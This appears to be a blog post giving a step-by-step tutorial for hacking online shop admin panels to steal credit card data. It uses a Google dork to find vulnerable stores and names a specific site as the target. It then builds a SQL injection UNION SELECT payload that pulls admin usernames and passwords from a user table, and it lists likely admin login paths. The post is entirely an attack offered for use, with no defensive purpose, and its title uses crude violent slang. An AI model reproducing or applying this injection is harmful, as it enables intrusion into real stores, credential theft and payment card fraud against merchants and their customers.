How to Hack ShopAdmin & Rape Some Credit Cards
1)go to google.com and put thisinurl:/shopdisplayproducts.asp
now we'll find some site with shopdisplayproducts.asp
Let's see some site
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14
2)Ok … now we put on end of link this sign ‘
3)Now the link will look like this
http://www.globalasp.org.uk/store/shopdisp….asp?id=14′and we get an error
error look like this
products
microsoft jet database engine error ‘80040e14′
syntax error in string in query expression ‘cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 14′ and hide=0 order by specialoffer desc,cname’.
/store/shop$db.asp, line 467
if we see this error then is hackable ) !!!
4)ok … now we removed ‘
http://www.globalasp.org.uk/store/sh…ucts.asp?id=14and on this add this
%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,
30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47,48,49,50%20from%20tbluser’
link now is
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
and put it in the browser we get the same error !!!
5)ok … now you see this numbers …
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50
now we removed ,50
and we now test
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
the same error and now we removed and removed number, and when we don’t see this error we must see some site, on this server correct number for
exploit is -> 47 <-
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
—> this you see 47 is the end number
ok now we put this in browser and don’t see error we see some laptops
ok … now we find on that site numbers 3 and 4
they are small
when we find that numbers we put where are 3 and 4 in link this code line
fldusername,fldpassword
now explotable link is this
http://www.globalasp.org.uk/store/shopdisp…%20tbluser’
there is login for shopadmin and we login !!!
this are path where can be shopadmins too
shopadmin.asp —-> this or … with 1
shopadmin1.asp —-> this is in 90 %
adminindex.html
shopadmin1.asp
shopa_displayorders.asp?page=2
shopa_displayorders.asp
shopa.asp
displayorders.asp
admin.asp
orders.asp
vieworders.asp
view_orders.asp
No comments:
Post a Comment